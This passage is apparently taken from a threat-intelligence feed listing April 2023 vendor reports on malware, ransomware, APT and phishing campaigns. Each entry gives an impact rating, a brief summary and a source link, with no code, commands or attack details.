LOW
Summary:
Cofense Intelligence Unit discovered Gh0st RAT, an old open-source RAT, targeting a healthcare organization. Gh0st RAT was created by a Chinese hacking group named C. The public release of the Gh0st RAT source code made it easy for threat actors to manipulate victims. Its information-stealing capabilities include taking full control of the infected machine, recording keystrokes in real time with offline logging available, accessing live webcam feeds including microphone recording, downloading files remotely, remote shutdown and reboot, and disabling user input.
Source: https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/
2023-04-24
New_OCX_HARVESTER_Attack_Campaign_Using_Modernized_More_Eggs_Suite
MEDIUM
+
Intel Source:
Securonix Threat Labs
Intel Name:
New_OCX_HARVESTER_Attack_Campaign_Using_Modernized_More_Eggs_Suite
Date of Scan:
2023-04-24
Impact:
MEDIUM
Summary:
Securonix Threat Labs researchers have observed a new attack campaign tracked as OCX#HARVESTER. Some of the malicious payloads leveraged as part of the attack campaign observed appear to be related to the More_eggs malicious payloads reported earlier.
Source: https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/
2023-04-24
Zero_Day_Vulnerabilities_in_PaperCut_Print_Management_Software
LOW
+
Intel Source:
Huntress
Intel Name:
Zero_Day_Vulnerabilities_in_PaperCut_Print_Management_Software
Date of Scan:
2023-04-24
Impact:
LOW
Summary:
Researchers from Huntress have tracked the exploitation of zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.
Source: https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
2023-04-24
The_QakBot_Malware_Continues_to_Evolve
LOW
+
Intel Source:
Cyble
Intel Name:
The_QakBot_Malware_Continues_to_Evolve
Date of Scan:
2023-04-24
Impact:
LOW
Summary:
Cyble Research Intelligence Labs have observed that several malware families, such as AsyncRAT, QuasarRAT, DCRAT, etc., have been found using OneNote attachments as part of their tactics. In February 2023, the well-known malware, Qakbot, started using OneNote attachments in their spam campaigns.
Source: https://blog.cyble.com/2023/04/21/qakbot-malware-continues-to-morph/
2023-04-24
BlueNoroff_APT_Group_Targeting_macOS_With_RustBucket_Malware
LOW
+
Intel Source:
Jamf
Intel Name:
BlueNoroff_APT_Group_Targeting_macOS_With_RustBucket_Malware
Date of Scan:
2023-04-24
Impact:
LOW
Summary:
Jamf Threat Labs have discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. They track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor.
Source: https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
2023-04-24
X_Trader_Supply_Chain_Attack_Affecting_Critical_Infrastructure_Organizations_in_US_and_Europe
MEDIUM
+
Intel Source:
Symantec
Intel Name:
X_Trader_Supply_Chain_Attack_Affecting_Critical_Infrastructure_Organizations_in_US_and_Europe
Date of Scan:
2023-04-24
Impact:
MEDIUM
Summary:
Researchers from Symantec have identified that North Korean-linked operations affected more organizations beyond 3CX, including two critical infrastructure organizations in the energy sector.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain
2023-04-24
ViperSoftX_Encryption_Updates
LOW
+
Intel Source:
TrendMicro
Intel Name:
ViperSoftX_Encryption_Updates
Date of Scan:
2023-04-24
Impact:
LOW
Summary:
TrendMicro researchers have observed the cryptocurrency and information stealer ViperSoftX evading initial loader detection and making its lure more believable by keeping the initial package loader, delivered via cracks, keygens, activators, and packers, non-malicious.
Source: https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html
2023-04-22
Scams_Involving_ChatGPT_Are_on_the_Rise
LOW
+
Intel Source:
PaloAlto
Intel Name:
Scams_Involving_ChatGPT_Are_on_the_Rise
Date of Scan:
2023-04-22
Impact:
LOW
Summary:
Unit42 researchers have monitored the newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.
Source: https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/
2023-04-22
Two_New_QakBot_C2_Servers_Detected
LOW
+
Intel Source:
Sophos
Intel Name:
Two_New_QakBot_C2_Servers_Detected
Date of Scan:
2023-04-22
Impact:
LOW
Summary:
Sophos researchers have detected two new QakBot servers that have not yet been publicly identified. These servers are used by threat actors to manage and control QakBot infections, a banking trojan that has been active since 2008 and primarily targets financial institutions and their customers.
Source: https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/
2023-04-22
Lazarus_Hackers_Pushing_Linux_Malware_via_Fake_Job_Offers
MEDIUM
+
Intel Source:
Welivesecurity
Intel Name:
Lazarus_Hackers_Pushing_Linux_Malware_via_Fake_Job_Offers
Date of Scan:
2023-04-22
Impact:
MEDIUM
Summary:
Researchers from Welivesecurity identified a new Lazarus campaign, considered part of "Operation DreamJob", targeting Linux users with malware for the first time.
Source: https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/
2023-04-22
The_Examination_of_EvilExtractor_Tool
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
The_Examination_of_EvilExtractor_Tool
Date of Scan:
2023-04-22
Impact:
MEDIUM
Summary:
FortiGuard Labs researchers have analyzed the EvilExtractor tool, an attack tool designed to target Windows operating systems and extract data and files from endpoint devices. They also observed this malware in a phishing email campaign on 30 March.
Source: https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer
2023-04-21
Hackers_Using_Abandoned_WordPress_Plugins_to_Backdoor_Websites
LOW
+
Intel Source:
Sucuri
Intel Name:
Hackers_Using_Abandoned_WordPress_Plugins_to_Backdoor_Websites
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
Sucuri researchers have identified that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.
Source: https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html
2023-04-21
EDR_Killer_AuKill_Exploiting_Process_Explorer_Drivers
MEDIUM
+
Intel Source:
Sophos
Intel Name:
EDR_Killer_AuKill_Exploiting_Process_Explorer_Drivers
Date of Scan:
2023-04-21
Impact:
MEDIUM
Summary:
Sophos researchers have investigated multiple incidents where attackers attempted to disable EDR clients with a new defense evasion tool dubbed AuKill. The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.
Source: https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
2023-04-21
Russian_Hackers_Conducting_Phishing_Attacks_in_Ukraine
LOW
+
Intel Source:
Google Blog
Intel Name:
Russian_Hackers_Conducting_Phishing_Attacks_in_Ukraine
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
Google Threat Analysis researchers have observed that Russian government-backed phishing campaigns targeted users in Ukraine the most, with the country accounting for over 60% of observed Russian targeting.
Source: https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
2023-04-21
Belarus_Linked_Hacking_Group_Targeting_Poland_With_New_Disinformation_Campaign
MEDIUM
+
Intel Source:
CSIRT-MON
Intel Name:
Belarus_Linked_Hacking_Group_Targeting_Poland_With_New_Disinformation_Campaign
Date of Scan:
2023-04-21
Impact:
MEDIUM
Summary:
CSIRT-MON researchers have issued a warning Wednesday about a recent disinformation campaign that has been traced back to the Belarusian hacking group known as Ghostwriter.
Source: https://csirt-mon.wp.mil.pl/pl/articles/6-aktualnosci/dezinformacja-o-rekrutacji-do-litpolukrbrig/
2023-04-21
Play_Ransomware_Group_Using_New_Custom_Data_Gathering_Tools
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Play_Ransomware_Group_Using_New_Custom_Data_Gathering_Tools
Date of Scan:
2023-04-21
Impact:
MEDIUM
Summary:
Symantec researchers have identified that the Play ransomware group is using two new, custom-developed tools that allow it to enumerate all users and computers on a compromised network, and copy files from the Volume Shadow Copy Service (VSS) that are normally locked by the operating system.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy
2023-04-21
SideCopy_Attack_Chain_Deploying_AllaKore_RAT
LOW
+
Intel Source:
Team-Cymru
Intel Name:
SideCopy_Attack_Chain_Deploying_AllaKore_RAT
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
Researchers from Team-Cymru have analyzed the SideCopy group and discovered the SideCopy attack chain used to deploy AllaKore RAT. It is an open-source remote access tool that has been modified for the purposes of SideCopy operations and is commonly observed in their intrusions.
Source: https://www.team-cymru.com/post/allakore-d-the-sidecopy-train
2023-04-21
Distribution_of_the_BlackBit_ransomware
LOW
+
Intel Source:
ASEC
Intel Name:
Distribution_of_the_BlackBit_ransomware
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of the BlackBit ransomware disguised as svchost.exe during the team’s monitoring. According to ASEC’s internal infrastructure, the BlackBit ransomware has been continuously distributed
Source: https://asec.ahnlab.com/en/51497/
2023-04-21
Daggerfly_APT_Group_Targeting_Telecoms_Company_in_Africa
LOW
+
Intel Source:
Symantec
Intel Name:
Daggerfly_APT_Group_Targeting_Telecoms_Company_in_Africa
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
Researchers from Symantec have identified that telecommunication service providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor since at least November 2022.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt-attacks-telecoms-africa-mgbot
2023-04-21
New_Attack_Chain_Uncovered_From_Blind_Eagle_Cyber_Espionage_Group
LOW
+
Intel Source:
Threatmon
Intel Name:
New_Attack_Chain_Uncovered_From_Blind_Eagle_Cyber_Espionage_Group
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
Researchers from Threatmon have observed that the cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
Source: https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/
2023-04-21
Hackers_Promptly_Adopting_Web3_IPFS_Technology
LOW
+
Intel Source:
PaloAlto
Intel Name:
Hackers_Promptly_Adopting_Web3_IPFS_Technology
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
PaloAlto researchers have observed several types of cyberthreats using the InterPlanetary File System (aka IPFS), including phishing, credential theft, command and control (C2) communications, and malicious payload distribution. They also observed a significant jump in IPFS-related traffic at the beginning of 2022.
Source: https://unit42.paloaltonetworks.com/ipfs-used-maliciously/
2023-04-21
Bumblebee_Malware_Distributing_Via_Trojanized_Installer_Downloads
MEDIUM
+
Intel Source:
Secureworks
Intel Name:
Bumblebee_Malware_Distributing_Via_Trojanized_Installer_Downloads
Date of Scan:
2023-04-21
Impact:
MEDIUM
Summary:
Source: https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads
2023-04-21
USB_Based_FlowCloud_Malware_Attacks
LOW
+
Intel Source:
NTT Security
Intel Name:
USB_Based_FlowCloud_Malware_Attacks
Date of Scan:
2023-04-21
Impact:
LOW
Summary:
Researchers from NTT Security have observed that several companies have been infected with FlowCloud, malware used by an attack group called TA410 that has been observed since around 2019.
Source: https://insight-jp.nttsecurity.com/post/102id0t/usbflowcloud
2023-04-20
Phishing_Campaign_Targeting_EPOS_Net_Customers
LOW
+
Intel Source:
Cofense
Intel Name:
Phishing_Campaign_Targeting_EPOS_Net_Customers
Date of Scan:
2023-04-20
Impact:
LOW
Summary:
The Cofense Phishing Defense Center has observed a sophisticated phishing campaign targeting customers of EPOS Net, a large Japanese credit card company. The campaign is notable for its meticulously crafted emails and cloned website, as well as its use of official customer service numbers to establish an illusion of legitimacy.
Source: https://cofense.com/blog/double-trouble-unmasking-the-epos-net-phishing-scheme-that-turns-trust-against-you/
2023-04-20
Hackers_From_Pakistan_Using_Linux_Malware_Poseidon_to_Target_Indian_Government_Agencies
MEDIUM
+
Intel Source:
Uptycs
Intel Name:
Hackers_From_Pakistan_Using_Linux_Malware_Poseidon_to_Target_Indian_Government_Agencies
Date of Scan:
2023-04-20
Impact:
MEDIUM
Summary:
Researchers from Uptycs have identified a Pakistan-based advanced persistent threat actor known as Transparent Tribe using a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
Source: https://www.uptycs.com/blog/cyber_espionage_in_india_decoding_apt_36_new_linux_malware
2023-04-20
Google_Ads_Abuse_and_Spear_Phishing_Campaigns_Impersonating_Spains_Tax_Agency
LOW
+
Intel Source:
BlackBerry
Intel Name:
Google_Ads_Abuse_and_Spear_Phishing_Campaigns_Impersonating_Spains_Tax_Agency
Date of Scan:
2023-04-20
Impact:
LOW
Summary:
Researchers from BlackBerry have observed two parallel malicious campaigns that use the same infrastructure but have different purposes. The first is a malvertising campaign on the Google Ads platform, and the second is a massive spear-phishing campaign targeting large organizations based in Spain. The campaign impersonated Spain’s tax agency, with the goal of harvesting the email credentials of companies in Spain.
Source: https://blogs.blackberry.com/en/2023/04/massive-spear-phishing-campaign-impersonating-spain-tax-agency
2023-04-20
New_Strain_of_Ransomware_Named_CrossLock
LOW
+
Intel Source:
Cyble
Intel Name:
New_Strain_of_Ransomware_Named_CrossLock
Date of Scan:
2023-04-20
Impact:
LOW
Summary:
Cyble researchers have discovered a new strain of ransomware called CrossLock, which is written in the programming language “Go”. It employs the double-extortion technique to increase the likelihood of payment from its victims and this technique involves encrypting the victim’s data as well as exfiltrating it from their system.
Source: https://blog.cyble.com/2023/04/18/crosslock-ransomware-emerges-new-golang-based-malware-on-the-horizon/
2023-04-19
The_Critical_Component_of_Aurora_Stealer_Attack_Delivery_Chain
LOW
+
Intel Source:
Morphisec
Intel Name:
The_Critical_Component_of_Aurora_Stealer_Attack_Delivery_Chain
Date of Scan:
2023-04-19
Impact:
LOW
Summary:
Morphisec researchers have observed that the component that makes Aurora’s delivery stealthy and dangerous is a highly evasive loader named “in2al5d p3in4er.” It is compiled with Embarcadero RAD Studio and targets endpoint workstations using advanced anti-VM (virtual machine) techniques.
Source: https://blog.morphisec.com/in2al5d-p3in4er
2023-04-19
Attacking_High_Value_Targets_With_Mint_Sandstorm
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Attacking_High_Value_Targets_With_Mint_Sandstorm
Date of Scan:
2023-04-19
Impact:
MEDIUM
Summary:
Microsoft researchers have observed a mature subgroup of Mint Sandstorm, an Iranian nation-state actor previously tracked as PHOSPHORUS, refining its tactics, techniques, and procedures (TTPs). Specifically, this subset has rapidly weaponized N-day vulnerabilities in common enterprise applications and conducted highly-targeted phishing campaigns to quickly and successfully access environments of interest.
Source: https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
2023-04-19
A_New_Backdoor_Called_Devopt
LOW
+
Intel Source:
Zscaler
Intel Name:
A_New_Backdoor_Called_Devopt
Date of Scan:
2023-04-19
Impact:
LOW
Summary:
Zscaler ThreatLabz researchers have identified a new backdoor called 'Devopt'. It utilizes hard-coded names for persistence and offers several functionalities, including keylogging, stealing browser credentials, clipper, and more. Multiple versions of the backdoor have surfaced in just the last few days, indicating that it is still in development.
Source: https://www.zscaler.com/blogs/security-research/introducing-devopt-multifunctional-backdoor-arsenal
2023-04-18
The_Activities_of_Tick_Group
LOW
+
Intel Source:
ASEC
Intel Name:
The_Activities_of_Tick_Group
Date of Scan:
2023-04-18
Impact:
LOW
Summary:
Researchers from ASEC have continued to track the activities of the Tick group, which has been targeting government agencies, the military, and various industries in Korea and Japan for over a decade.
Source: https://asec.ahnlab.com/en/51340/
2023-04-18
Hackers_From_Iran_Leveraging_SimpleHelp_Remote_Support_Software_for_Persistent_Access
MEDIUM
+
Intel Source:
Group-IB
Intel Name:
Hackers_From_Iran_Leveraging_SimpleHelp_Remote_Support_Software_for_Persistent_Access
Date of Scan:
2023-04-18
Impact:
MEDIUM
Summary:
Researchers from Group-IB have identified that the Iranian threat actor known as MuddyWater is continuing its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems.
Source: https://www.group-ib.com/blog/muddywater-infrastructure/
2023-04-18
Gamaredon_Groups_Automated_Spear_Phishing_Campaigns_Revealed_by_Exposed_Web_Panel
MEDIUM
+
Intel Source:
EclecticIQ
Intel Name:
Gamaredon_Groups_Automated_Spear_Phishing_Campaigns_Revealed_by_Exposed_Web_Panel
Date of Scan:
2023-04-18
Impact:
MEDIUM
Summary:
EclecticIQ researchers have identified a spear phishing campaign targeting Ukrainian government entities like the Foreign Intelligence Service of Ukraine (SZRU) and the Security Service of Ukraine (SSU), likely conducted by APT group Gamaredon.
Source: https://blog.eclecticiq.com/exposed-web-panel-reveals-gamaredon-groups-automated-spear-phishing-campaigns
2023-04-18
The_Examination_of_BabLock_Ransomware
LOW
+
Intel Source:
TrendMicro
Intel Name:
The_Examination_of_BabLock_Ransomware
Date of Scan:
2023-04-18
Impact:
LOW
Summary:
TrendMicro researchers have analyzed stealthy and expeditious ransomware called BabLock (aka Rorschach). It has recently been making waves due to its sophisticated and fast-moving attack chain that uses subtle yet effective techniques.
Source: https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html
2023-04-18
QBot_Banker_Delivering_Via_Business_Correspondence
LOW
+
Intel Source:
Securelist
Intel Name:
QBot_Banker_Delivering_Via_Business_Correspondence
Date of Scan:
2023-04-18
Impact:
LOW
Summary:
Securelist researchers have observed a significant increase in attacks that use banking Trojans of the QBot family. The malware is delivered through emails written in different languages, with variations in English, German, Italian, and French. The messages were based on real business letters the attackers had gained access to, which allowed them to join the correspondence thread with messages of their own.
Source: https://securelist.com/qbot-banker-business-correspondence/109535/
2023-04-18
Trigona_Ransomware_Attacking_MS_SQL_Servers
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Trigona_Ransomware_Attacking_MS_SQL_Servers
Date of Scan:
2023-04-18
Impact:
MEDIUM
Summary:
ASEC researchers have discovered that the Trigona ransomware is being installed on poorly managed MS-SQL servers; typical attacks include brute-force and dictionary attacks against systems whose account credentials are poorly managed.
Source: https://asec.ahnlab.com/en/51343/
2023-04-17
LockBit_Encryptor_Targeting_macOS_System
MEDIUM
+
Intel Source:
Malware Hunter
Intel Name:
LockBit_Encryptor_Targeting_macOS_System
Date of Scan:
2023-04-17
Impact:
MEDIUM
Summary:
Researchers from the MalwareHunterTeam have warned that the LockBit ransomware gang has developed encryptors to target macOS devices.
Source: https://twitter.com/malwrhunterteam/status/1647384505550876675
2023-04-17
Fraudulent_Campaign_Using_Fake_Google_Chrome_Error_to_Spread_Malware
LOW
+
Intel Source:
NTT Security
Intel Name:
Fraudulent_Campaign_Using_Fake_Google_Chrome_Error_to_Spread_Malware
Date of Scan:
2023-04-17
Impact:
LOW
Summary:
Researchers from NTT Security have observed an attack campaign distributing malware from a web page disguised as a Google Chrome error message since around November 2022. It has been active since around February 2023, and attacks have been confirmed over a very wide area, so close attention is required.
Source: https://insight-jp.nttsecurity.com/post/102icvb/attack-campaign-that-uses-fake-google-chrome-error-to-distribute-malware-from-com
2023-04-17
Threat_Actors_From_Conti_and_FIN7_Collaborate_With_Domino_Backdoor
MEDIUM
+
Intel Source:
IBM Security Intelligence
Intel Name:
Threat_Actors_From_Conti_and_FIN7_Collaborate_With_Domino_Backdoor
Date of Scan:
2023-04-17
Impact:
MEDIUM
Summary:
Researchers from IBM Security have discovered a new malware family called Domino that is created by developers associated with the cybercriminal group that X-Force tracks as ITG14, also known as FIN7.
Source: https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/
2023-04-17
The_Analysis_of_Trigona_Ransomware
LOW
+
Intel Source:
Zscaler
Intel Name:
The_Analysis_of_Trigona_Ransomware
Date of Scan:
2023-04-17
Impact:
LOW
Summary:
Zscaler researchers have analyzed the Trigona ransomware. It is written in the Delphi programming language and has been active since at least June 2022.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-trigona-ransomware
2023-04-17
Zaraza_Bot_Credential_Stealer_Targeting_Browser_Passwords
LOW
+
Intel Source:
Uptycs
Intel Name:
Zaraza_Bot_Credential_Stealer_Targeting_Browser_Passwords
Date of Scan:
2023-04-17
Impact:
LOW
Summary:
Researchers from the Uptycs team have identified a new variant of credential-stealing malware, dubbed Zaraza bot, which uses Telegram as its command and control; "zaraza" is the Russian word for infection.
Source: https://www.uptycs.com/blog/zaraza-bot-credential-password-stealer
2023-04-17
An_Overview_of_Tax_Scammers
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
An_Overview_of_Tax_Scammers
Date of Scan:
2023-04-17
Impact:
MEDIUM
Summary:
Fortinet researchers have analyzed a few examples of malware that take advantage of tax season. Attackers make every attempt to scam taxpayers for financial gain and data exfiltration for future attacks.
Source: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large
2023-04-16
Bitter_Group_CHM_malware_distribution
LOW
+
Intel Source:
Ciberdefensa
Intel Name:
Bitter_Group_CHM_malware_distribution
Date of Scan:
2023-04-16
Impact:
LOW
Summary:
The Bitter group has been distributing CHM malware to certain Chinese organizations through compressed email attachments with filenames such as "Project Plan 2023.chm". When executed, the CHM files display content related to Chinese and Russian organizations and activate a malicious script that executes additional malware.
Source: https://ciberdefensa.cat/archivos/10456
2023-04-16
Money_Ransomware
LOW
+
Intel Source:
Yoroi
Intel Name:
Money_Ransomware
Date of Scan:
2023-04-16
Impact:
LOW
Summary:
The article discusses the Money Ransomware group, which utilizes a double extortion model by encrypting data and exfiltrating sensitive information, threatening to publish the data unless a ransom is paid.
Source: https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/?&web_view=true
2023-04-15
Threat_Actors_Try_to_Wreak_Havoc_on_Tax_Day
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Threat_Actors_Try_to_Wreak_Havoc_on_Tax_Day
Date of Scan:
2023-04-15
Impact:
MEDIUM
Summary:
Microsoft researchers have observed phishing attacks targeting accounting and tax return preparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in February of this year.
Source: https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/
2023-04-15
Malware_Attacks_on_Tax_Firms
LOW
+
Intel Source:
Sophos
Intel Name:
Malware_Attacks_on_Tax_Firms
Date of Scan:
2023-04-15
Impact:
LOW
Summary:
Sophos researchers have observed that a threat actor is targeting financial accounting firms and CPAs with an attack that combines social engineering with a novel exploit against Windows computers to deliver malware called GuLoader.
Source: https://news.sophos.com/en-us/2023/04/13/tax-firms-targeted-by-precision-malware-attacks/
2023-04-15
The_Activity_of_Emerging_Cybercriminal_Group_Named_Read_The_Manual_RTM_Locker
LOW
+
Intel Source:
Trellix
Intel Name:
The_Activity_of_Emerging_Cybercriminal_Group_Named_Read_The_Manual_RTM_Locker
Date of Scan:
2023-04-15
Impact:
LOW
Summary:
Researchers from Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal gang called ‘Read The Manual’ (RTM) Locker. The group provides ransomware-as-a-service (RaaS) and supplies its malicious code to a network of affiliates while imposing strict rules on them.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/read-the-manual-locker-a-private-raas-provider.html
2023-04-14
Bitter_Group_Distributing_CHM_Malware_to_Chinese_Organizations
LOW
+
Intel Source:
ASEC
Intel Name:
Bitter_Group_Distributing_CHM_Malware_to_Chinese_Organizations
Date of Scan:
2023-04-14
Impact:
LOW
Summary:
Researchers from ASEC have identified multiple instances of the Bitter group distributing CHM malware to certain Chinese organizations. The files used in the recent attack are distributed as compressed email attachments. The compressed files contain a CHM file with varying filenames.
Source: https://asec.ahnlab.com/en/51043/
2023-04-14
Russian_Hackers_Targeting_NATO_and_EU
MEDIUM
+
Intel Source:
CERT-PL
Intel Name:
Russian_Hackers_Targeting_NATO_and_EU
Date of Scan:
2023-04-14
Impact:
MEDIUM
Summary:
Researchers from the Military Counterintelligence Service and the CERT Polska team have observed a widespread espionage campaign linked to Russian intelligence services and targeting NATO and the EU.
Source: https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services
2023-04-14
APT36_Group_Targeting_Indian_Education_Sector
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
APT36_Group_Targeting_Indian_Education_Sector
Date of Scan:
2023-04-14
Impact:
MEDIUM
Summary:
Researchers from SentinelOne have identified a cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (also known as Transparent Tribe) targeting the education sector.
Source: https://www.sentinelone.com/labs/transparent-tribe-apt36-pakistan-aligned-threat-actor-expands-interest-in-indian-education-sector/
2023-04-14
New_Legion_Hacktool_Stealing_Credentials_From_Misconfigured_Sites
MEDIUM
+
Intel Source:
CADO
Intel Name:
New_Legion_Hacktool_Stealing_Credentials_From_Misconfigured_Sites
Date of Scan:
2023-04-14
Impact:
MEDIUM
Summary:
CADO Security researchers have identified a new Python-based credential harvester and SMTP hijacking tool named ‘Legion’ that is being sold on Telegram that targets online email services for phishing and spam attacks.
Source: https://www.cadosecurity.com/legion-an-aws-credential-harvester-and-smtp-hijacker/
2023-04-13
GuLoader_Targeting_the_Financial_Sector_Using_a_Taxthemed_Phishing_Lure
MEDIUM
+
Intel Source:
eSentire
Intel Name:
GuLoader_Targeting_the_Financial_Sector_Using_a_Taxthemed_Phishing_Lure
Date of Scan:
2023-04-13
Impact:
MEDIUM
Summary:
Researchers from eSentire have observed GuLoader targeting the financial sector via phishing emails using a tax-themed lure. The phishing email contains an Adobe Acrobat share link, from which the user can download a password-protected ZIP archive.
Source: https://www.esentire.com/blog/guloader-targeting-the-financial-sector-using-a-tax-themed-phishing-lure
2023-04-13
DigitalOceans_Tech_Support_Scam_Shifts_to_StackPaths_CDN
MEDIUM
+
Intel Source:
Netskope
Intel Name:
DigitalOceans_Tech_Support_Scam_Shifts_to_StackPaths_CDN
Date of Scan:
2023-04-13
Impact:
MEDIUM
Summary:
Netskope researchers have identified that attackers previously abusing DigitalOcean to host a tech support scam have expanded the operation, now abusing StackPath CDN to distribute the scam, and are likely to start abusing additional cloud services to deliver the scam in the near future.
Source: https://www.netskope.com/pt/blog/tech-support-scam-pivots-from-digitalocean-to-stackpath-cdn
2023-04-13
Chinese_Hacking_Group_Targeting_European_Governments_and_Businesses
HIGH
+
Intel Source:
SecuInfra
Intel Name:
Chinese_Hacking_Group_Targeting_European_Governments_and_Businesses
Date of Scan:
2023-04-13
Impact:
HIGH
Summary:
Researchers from SecuInfra have observed that Chinese APT groups are targeting European governments and businesses. Recently, the European Union Agency for Cybersecurity (ENISA) and CERT-EU warned about malicious activities against EU governments and businesses attributed to Chinese Advanced Persistent Threat (APT) groups.
Source: https://www.secuinfra.com/en/news/beijing-calling-chinese-apts-are-targeting-european-governments-and-businesses/
2023-04-13
Raise_in_Qakbot_Malware_Incidents
LOW
+
Intel Source:
eSentire
Intel Name:
Raise_in_Qakbot_Malware_Incidents
Date of Scan:
2023-04-13
Impact:
LOW
Summary:
Researchers from eSentire have observed a significant increase in Qakbot incidents impacting various industries.
Source: https://www.esentire.com/security-advisories/increase-in-observations-of-qakbot-malware
2023-04-13
Qakbot_Distributing_via_Email_Hijacking
LOW
+
Intel Source:
ASEC
Intel Name:
Qakbot_Distributing_via_Email_Hijacking
Date of Scan:
2023-04-13
Impact:
LOW
Summary:
ASEC Lab researchers have identified instances of Qakbot malware being distributed via malicious PDF files attached to forwards of, or replies to, existing emails.
Source: https://asec.ahnlab.com/en/51282/
2023-04-13
ASEC_Weekly_Malware_Analyses_April_03rd_April_09th_2023
LOW
+
Intel Source:
ASEC
Intel Name:
ASEC_Weekly_Malware_Analyses_April_03rd_April_09th_2023
Date of Scan:
2023-04-13
Impact:
LOW
Summary:
ASEC researchers have analyzed the malware and found backdoor ranked top with 61.1%, followed by Infostealer with 20.8%, downloader with 16.9%, and ransomware with 1.1%.
Source: https://asec.ahnlab.com/en/51274/
2023-04-13
Color1337_Cryptojacking_Campaign_Targeting_Linux_Machines
LOW
+
Intel Source:
Tehtris
Intel Name:
Color1337_Cryptojacking_Campaign_Targeting_Linux_Machines
Date of Scan:
2023-04-13
Impact:
LOW
Summary:
Researchers from Tehtris have identified a cryptojacking campaign, believed to have originated from Romania, and targeting Linux machines. This campaign, dubbed Color1337, leverages a botnet to mine Monero and the botnet can propagate itself to other machines across the network.
Source: https://tehtris.com/en/blog/linux-focus-on-a-cryptomining-attack-dubbed-color1337
2023-04-12
An_attack_campaign_distributing_malware_disguised_as_a_Google_Chrome
LOW
+
Intel Source:
NTT Security
Intel Name:
An_attack_campaign_distributing_malware_disguised_as_a_Google_Chrome
Date of Scan:
2023-04-12
Impact:
LOW
Summary:
Since around November 2022, the SOC has been observing an attack campaign distributing malware from a web page disguised as a Google Chrome error screen. It became active around February 2023, and malware downloads have been confirmed over a very wide area, so caution is required. This article provides an overview of the attack campaign and the malware.
Source: https://insight-jp.nttsecurity.com/post/102ic6o/webgoogle-chrome
2023-04-12
Attacks_With_Nokoyawa_Ransomware_Using_ZeroDay_Vulnerabilities_in_Windows
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Attacks_With_Nokoyawa_Ransomware_Using_ZeroDay_Vulnerabilities_in_Windows
Date of Scan:
2023-04-12
Impact:
MEDIUM
Summary:
Securelist researchers have analyzed the CVE-2023-28252 zero-day vulnerability in Common Log File System (CLFS).
Source: https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/
2023-04-12
Recent_Activity_of_IcedID
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Recent_Activity_of_IcedID
Date of Scan:
2023-04-12
Impact:
LOW
Summary:
